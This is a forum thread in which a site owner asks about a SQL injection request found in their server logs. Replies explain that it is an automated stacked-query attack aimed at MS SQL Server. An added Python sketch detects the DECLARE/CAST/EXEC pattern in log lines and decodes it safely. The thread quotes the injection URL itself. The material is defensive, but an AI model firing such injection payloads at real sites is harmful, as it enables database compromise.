  1. #1
    SitePoint Zealot

    What is this person trying to do?

    I noticed some odd URL requests in my server logs today:

    Code:
    http://site.com/page.php?%27;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S);
    Any idea what this is trying to do? Some sort of injection attack?

  2. #2
    Evan2all (SitePoint Addict)

    Is there any submit query running in that page???

  3. #3
    wwb_99 (SitePoint Author)
    There is an automated SQL injection attack that is aimed at MSSQL, and that is one example of said attack. If you have things properly secured you don't have anything to worry about.

  4. #4
    SitePoint Zealot
    Originally posted by Evan2all:

    "Is there any submit query running in that page???"

    Not a form submit, but a variable is taken from the URL to query the MySQL DB to list things.

    I sanitize the input using a PHP open source class.

    Thanks guys. My site has been steadily climbing the popularity ranks and I'm starting to see more of these types of things. I had an iframe injection attack the other day on an improperly secured comment form. D'oh!

  5. #5
    SitePoint Zealot
    Ban this site; it sounds like an attack.

  6. #6
    SitePoint Member
    It's an automated SQL injection attack. I've been seeing this one in logs recently. Most likely a blind attempt at MS SQL Server. Won't work against MySQL, as PHP's interface doesn't support multiple queries in a function call (notice the semicolons in that query - trying to execute more than one at a time).
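
Added example, not part of any post in this thread: a Python sketch that recognises the DECLARE / CAST(0x...) / EXEC shape of the logged request in access-log lines and decodes the hex blob for reading without running it. The function names, the sample log lines and the harmless hex payload are constructed, and the single-byte code page for plain CHAR is assumed to be Latin-1.

```python
import re
from urllib.parse import unquote

# Shape of the logged request: DECLARE @S CHAR(n); SET @S=CAST(0x<hex> AS CHAR(n)); EXEC(@S)
STACKED_EXEC = re.compile(
    r"DECLARE\s+@(\w+)\s+N?(?:VAR)?CHAR\(\d+\)\s*;\s*"
    r"SET\s+@\1\s*=\s*CAST\(\s*0x([0-9A-F]*)\s+AS\s+(N?)(?:VAR)?CHAR\(\d+\)\s*\)\s*;\s*"
    r"EXEC\s*\(\s*@\1\s*\)",
    re.IGNORECASE,
)


def inspect_request(url):
    """Return None if the URL lacks the pattern, else a dict; the payload is decoded, never run."""
    query = unquote(url.partition("?")[2])
    match = STACKED_EXEC.search(query)
    if match is None:
        return None
    hex_blob, wide = match.group(2), match.group(3)
    try:
        raw = bytes.fromhex(hex_blob)
    except ValueError:  # odd number of hex digits: still report the hit
        return {"decoded": None, "bytes": 0}
    # Assumption: N-prefixed types hold UTF-16LE, plain CHAR a single-byte code page (Latin-1).
    text = raw.decode("utf-16-le" if wide else "latin-1", errors="replace")
    return {"decoded": text, "bytes": len(raw)}


def scan(lines):
    """Yield (line_number, result) for every log line that carries the pattern."""
    for number, line in enumerate(lines, start=1):
        for token in line.split():
            if "?" in token:
                result = inspect_request(token)
                if result:
                    yield number, result


# Constructed sample log lines; the hex is the harmless text "PRINT 'constructed sample'".
SAMPLE_HEX = "PRINT 'constructed sample'".encode("latin-1").hex().upper()
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2009:10:00:00 +0000] "GET /page.php?id=12 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2009:10:00:05 +0000] "GET /page.php?%27;DECLARE%20@S%20CHAR(4000);'
    "SET%20@S=CAST(0x" + SAMPLE_HEX + '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, result in scan(SAMPLE_LOG):
        print(f"line {number}: {result['bytes']} bytes -> {result['decoded']!r}")
```

A hit in the log only shows the request was made; whether it had any effect depends on how the page builds its query.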

